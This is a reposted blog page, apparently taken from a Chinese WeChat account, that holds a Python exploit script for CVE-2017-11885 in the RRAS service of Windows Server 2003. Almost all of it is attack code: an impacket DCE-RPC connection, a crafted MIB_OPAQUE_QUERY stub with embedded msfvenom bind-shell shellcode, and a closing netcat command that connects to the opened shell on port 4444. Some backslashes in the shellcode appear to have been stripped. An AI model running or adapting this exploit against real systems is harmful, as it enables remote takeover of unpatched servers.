CVE-2017-11885 EXP

admin 2022年4月23日22:47:12评论31 views字数 3206阅读10分41秒阅读模式
#!/usr/bin/env python # -*- coding: utf-8 -*- #Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.  #The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure. #dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution. #Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using  #Windows Server 2003.  #Exploit created by: Víctor Portal #For learning purpose only  import struct import sys import time import os  from threading import Thread                                      from impacket import smb from impacket import uuid from impacket import dcerpc from impacket.dcerpc.v5 import transport                   target = sys.argv[1]  print '[-]Initiating connection' trans = transport.DCERPCTransportFactory('ncacn_np:%s[\pipe\browser]' % target) trans.connect()  print '[-]connected to ncacn_np:%s[\pipe\browser]' % target dce = trans.DCERPC_class(trans)  #RRAS DCE-RPC endpoint dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))  #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "x00" -f python buf =  "" buf += "xb8x3cxb1x1ex1dxd9xc8xd9x74x24xf4x5ax33" buf += "xc9xb1x53x83xc2x04x31x42x0ex03x7exbfxfc" buf += "xe8x82x57x82x13x7axa8xe3x9ax9fx99x23xf8" buf += "xd4x8ax93x8axb8x26x5fxdex28xbcx2dxf7x5f" buf += "x75x9bx21x6ex86xb0x12xf1x04xcbx46xd1x35" buf += "x04x9bx10x71x79x56x40x2axf5xc5x74x5fx43" buf += "xd6xffx13x45x5ex1cxe3x64x4fxb3x7fx3fx4f" buf += "x32x53x4bxc6x2cxb0x76x90xc7x02x0cx23x01" buf += "x5bxedx88x6cx53x1cxd0xa9x54xffxa7xc3xa6" buf += "x82xbfx10xd4x58x35x82x7ex2axedx6ex7exff" buf += "x68xe5x8cxb4xffxa1x90x4bxd3xdaxadxc0xd2" buf += "x0cx24x92xf0x88x6cx40x98x89xc8x27xa5xc9" buf += "xb2x98x03x82x5fxccx39xc9x37x21x70xf1xc7" buf += "x2dx03x82xf5xf2xbfx0cxb6x7bx66xcbxb9x51" buf += "xdex43x44x5ax1fx4ax83x0ex4fxe4x22x2fx04" buf += "xf4xcbxfaxb1xfcx6ax55xa4x01xccx05x68xa9" buf += "xa5x4fx67x96xd6x6fxadxbfx7fx92x4exaex23" buf += "x1bxa8xbaxcbx4dx62x52x2exaaxbbxc5x51x98" buf += "x93x61x19xcax24x8ex9axd8x02x18x11x0fx97" buf += "x39x26x1axbfx2exb1xd0x2ex1dx23xe4x7axf5" buf += "xc0x77xe1x05x8ex6bxbex52xc7x5axb7x36xf5" buf += "xc5x61x24x04x93x4axecxd3x60x54xedx96xdd" buf += "x72xfdx6exddx3exa9x3ex88xe8x07xf9x62x5b" buf += "xf1x53xd8x35x95x22x12x86xe3x2ax7fx70x0b" buf += "x9axd6xc5x34x13xbfxc1x4dx49x5fx2dx84xc9" buf += "x6fx64x84x78xf8x21x5dx39x65xd2x88x7ex90" buf += "x51x38xffx67x49x49xfax2cxcdxa2x76x3cxb8" buf += "xc4x25x3dxe9"  #NDR format stub = "x21x00x00x00" #dwPid = PID_IP (IPv4) stub += "x10x27x00x00" #dwRoutingPID stub += "xa4x86x01x00" #dwMibInEntrySize  stub += "x41"*4 #_MIB_OPAQUE_QUERY pointer stub += "x04x00x00x00"  #dwVarID (_MIB_OPAQUE_QUERY) stub += "x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY) stub += "xa4x86x01x00" #dwMibOutEntrySize  stub += "xadx0bx2dx06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY) stub +=  "xd0xbax61x41x41" + "x90"*5 + buf + "x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY) stub += "x04x00x00x00" #dwId (_MIB_OPAQUE_INFO) stub += "x41"*4 #ullAlign (_MIB_OPAQUE_INFO), stub)   #0x1d MIBEntryGetFirst (other RPC calls are also affected) print "[-]Exploit sent to target successfully..."  print "Waiting for shell..." time.sleep(5) os.system("nc " + target + " 4444")

原文始发于微信公众号(中国白客联盟):CVE-2017-11885 EXP

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  • 本文由 发表于 2022年4月23日22:47:12
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                   CVE-2017-11885 EXP


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